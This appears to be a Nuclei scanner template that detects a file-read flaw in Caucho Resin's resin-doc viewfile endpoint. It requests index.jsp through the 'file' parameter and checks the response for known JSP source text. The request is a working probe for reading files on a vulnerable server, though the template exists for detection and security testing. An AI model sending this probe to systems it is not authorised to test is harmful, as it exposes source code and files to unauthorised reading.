id: resin-viewfile-lfr
info:
  name: Caucho Resin LFR
  author: princechaddha
  severity: high
  description: There is an input verification vulnerability in the implementation of a certain CGI program in Resin. A remote attacker may use this vulnerability to read any files in the home directory of the Web, including JSP source code or class files.
  reference:
    - http://0day5.com/archives/1173/
    - https://www.cnvd.org.cn/flaw/show/CNVD-2006-3205
  tags: resin,caucho,lfr

http:
  - method: GET
    path:
      - "{{BaseURL}}/resin-doc/viewfile/?file=index.jsp"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %"
        part: body
